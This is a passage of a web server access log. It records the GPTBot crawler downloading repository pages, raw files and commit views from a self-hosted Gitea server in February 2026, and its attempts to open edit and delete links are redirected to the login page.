GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10294] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10681] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 874] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:17:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 11073] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:17:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14338] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10006] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 11025] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 11323] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 11311] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:23:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" -[17/Feb/2026:17:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/my_database.db" -[17/Feb/2026:17:23:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" -[17/Feb/2026:17:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/my_database.db" -[17/Feb/2026:17:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 875] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" -[17/Feb/2026:17:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" -[17/Feb/2026:17:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14597] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:23:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:23:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:23:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:23:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:23:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:23:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2fcontroller-cpp2.md" [Client 74.7.227.38] [Length 22279] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" -[17/Feb/2026:17:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" -[17/Feb/2026:17:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19745] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" -[17/Feb/2026:17:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17356] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21438] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 